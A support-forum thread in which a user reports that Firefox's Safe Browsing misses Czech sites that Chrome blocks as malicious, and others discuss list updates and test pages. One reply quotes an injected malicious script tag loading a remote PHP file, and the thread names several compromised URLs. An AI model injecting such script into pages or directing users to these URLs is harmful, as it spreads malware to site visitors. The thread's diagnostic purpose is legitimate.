Search Support

Avoid support scams. We will never ask you to call or text a phone number or share personal information. Please report suspicious activity using the “Report Abuse” option.

Learn More

FF's Safebrowsing doesn't block malicious sites, Chrome's does.

more options

Here are examples of sites that Google Safebrowsing diagnostics tags as malicious. Chrome Safebrowsings implementation blocks them all. However, Firefox Safebrowsing blocks none of them, it never popups when I access the sites, and I'm not protected.

Examples: 1. malicious site: http://hubka.cz/20061105/2006-10-29_Kounov_slunicko (connects to send29931.cn) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhubka.cz%2F20061105%2F2006-10-29_Kounov_slunicko )

2. malicious site: http://www.koupelnysykora.cz/kontakt.php (contains malicious <script>) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.koupelnysykora.cz%2Fkontakt.php )

3. malicious site: http://masazerumburk.cz/tejpovani.html (connects to other malicious site) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fmasazerumburk.cz%2Ftejpovani.html )


For most sites FF's Safebrowsing works well. Is FF using official Safebrowsing service at https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign ? Could there be an error in FF's implementation of Safebrowsing service, or in Safebrowsing service itself?

FF 38.0 / Ubuntu 14.04, all updated. Thanks for all ideas,

E2rd
Here are examples of sites that Google Safebrowsing diagnostics tags as malicious. Chrome Safebrowsings implementation blocks them all. However, Firefox Safebrowsing blocks none of them, it never popups when I access the sites, and I'm not protected. Examples: 1. malicious site: http://hubka.cz/20061105/2006-10-29_Kounov_slunicko (connects to send29931.cn) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhubka.cz%2F20061105%2F2006-10-29_Kounov_slunicko ) 2. malicious site: http://www.koupelnysykora.cz/kontakt.php (contains malicious <script>) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.koupelnysykora.cz%2Fkontakt.php ) 3. malicious site: http://masazerumburk.cz/tejpovani.html (connects to other malicious site) Firefox don't block, Chrome blocks, Safebrowsing tags as malicious ( https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fmasazerumburk.cz%2Ftejpovani.html ) For most sites FF's Safebrowsing works well. Is FF using official Safebrowsing service at https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign ? Could there be an error in FF's implementation of Safebrowsing service, or in Safebrowsing service itself? FF 38.0 / Ubuntu 14.04, all updated. Thanks for all ideas, E2rd

Ŋuɖoɖo si wotia

Regarding timing issues: Firefox downloads lists from SafeBrowsing at various intervals so it can check URLs locally. Firefox does not query in real time to avoid leaking your browsing history to Google.

Xle ŋuɖoɖo sia le goya me 👍 1

All Replies (7)

more options

Not sure I am seeing anything unexpected

  1. http://send29931.cn/ Is blocked as an attack site
  2. Safe Browsing
    Diagnostic page for www.koupelnysykora.cz
    What is the current listing status for www.koupelnysykora.cz?
    This site is not currently listed as suspicious.
  3. Safe Browsing
    Diagnostic page for masazerumburk.cz
    What is the current listing status for masazerumburk.cz?
    This site is not currently listed as suspicious.

Just a guess but possibly due to Firefox piggybacking on Google's service and needing to update from Google their own browser has the information first.

This is our help article

more options

Thanks for your reply and for the links.

add 2) Really, Sykora is not blocked by Chrome anymore (it has changed from afternoon). But the malicious code is still present (2_sykora screenshot) and sometimes, it connects to malicious page on suncenter.org (1_sykora screenshot). And Google diagnostics DO accuse the site from hosting malware (3_sykora screenshot https://www.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.koupelnysykora.cz%2Fkontakt.php ) - "The last time Google visited this site was on 2015-05-29, and the last time suspicious content was found on this site was on 2015-05-29."

add 3) The same for the masazerumburk site. It is still diagnosed as hosting malware, still blocked by Chrome (4_chrome screenshot) a not blocked by FF (5_masaze screenshot). The malicious injected code is in the beginning of the body tag: Rumburk</div><script type="text/javascript" src="http://www.hagen-kuenz.at/3dgtzjc9.php?id=465505"></script>

add piggybacking) I suspect it will not be updated. There are sites that are malicious as not having malware since few days, but FF still doesn't block them. Let's wait till Monday, I'll recheck if the infection is still present and if these sites are blocked by FF and let you know. If not, there may be an error in the Google's service that Firefox uses.

more options

This may not be the best place for reporting these problems, but at least we can try to figure out whether to report this elsewhere.


By the way did you try the test pages ? and do they work ?

IIRC they moved the test sites off mozilla so as not to damage mozilla's reputation and rating.

more options

Ɖɔɖɔɖo si wotia

Regarding timing issues: Firefox downloads lists from SafeBrowsing at various intervals so it can check URLs locally. Firefox does not query in real time to avoid leaking your browsing history to Google.

more options

Hi all, The strange behaviour of Firefox is the fault of Google Safebrowsing.

> did you try the [IIRC] test pages ? and do they work ? Yes, I tried them now in Firefox both. They work, red splash screen popups. As I said before, for most sites FF's Safebrowsing works well. However, there are site which should be blocked (and are tagged as malicious in Google Safebrowsing) but they are not. The purpose of this thread is to ask if FF using official Safebrowsing service at https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign . If so, I suspect there are bug in this service, and I'll try to report it to Google itself somehow.

> This may not be the best place for reporting these problems, but at least we can try to figure out whether to report this elsewhere. Have you got any idea where it should be reported? Thanks!


Koupelny sykora > suncenter.org What issues are you seeing ? This site has been hacked. Hacker has uploaded malicious file: http://www.suncenter.org/emails/C2r9TXFy.php If you access the URL, you'll be redirected to localhost. However, Google has not yet found the infection, so the diagnostics page is alright. Google diagnostics don't know about the corrupted page.

> www.koupelnysykora.cz To me it appears correct to not block this site > "last time suspicious content was found on this site was on 2015-05-29. " It was on Friday. Now, it says: "The last time Google visited this site was on 2015-06-01, and the last time suspicious content was found on this site was on 2015-06-01." But you are right. The Google says that it is safe and Chrome blocks it no more. (It is a pity because hacker still has got the access to the file uploaded at suncenter. The malicious file is still there, so the site has not been cleaned.) It is very strange behaviour of Google Safebrowsing diagnostics that it says malware is still there but the site is not to be blocked. However, this it not the problem of Mozilla.


masazerumburk You are checking wrong page. There is difference between "www" and not "www" and between masazerumburk.cz/tejpovani.html (infected) and masazerumburk.cz (not infected).

Google diagnostics for all the combination. www.masazerumburk.cz/tejpovani.html - not suspicious, not hosting malware, blocked by Chrome www.masazerumburk.cz - not suspicious, not hosting malware, not blocked by Chrome masazerumburk.cz/tejpovani.html - not suspicious, do hosting malware, blocked by Chrome masazerumburk.cz - not suspicious, do hosting malware, not blocked by Chrome

Strange behaviour, Chrome blocks something else than Google diagnostics recommends.

I see Google Safebrowsing service is little bit fuzzy for some sites. It says they are not suspicious, however, they host malware and they should be blocked by FF (as they are blocked by Chrome). Nevertheless, I understand FF can't know they are to be blocked when Google Safebrowsing do not tell.

more options

Is there any way to change the Firefox update frequency for the Anti-Phishing & Anti-Malware blocklists, since the current frequency doesn't seem to be as effective as Chrome's implementation? If not, is there a way to force an update via the command line so I can schedule it manually? Also about how large are the update files?

Virvilis, N., Mylonas, A., Tsalis, N., & Gritzalis, D. (2015). Security busters: Web browser security vs. rogue sites. Computers & Security, 52, 90-105. doi:10.1016/j.cose.2015.04.009. Retrieved from http://www.cis.aueb.gr/Publications/C%26S-Insecure-Browsing.pdf

more options

Hi BubbleHead, on Windows, you can see the actual files in the "temporary" profile folder here:

type or paste

%LOCALAPPDATA%\Mozilla\Firefox\Profiles

in the Start menu search box and press Enter

then double-click into your currently active profile and into the safebrowsing folder.

I don't know whether you can change the frequency of download.

(The research paper tested Firefox 29; download reputation was added in Firefox 31. That only affects the later part of the testing.)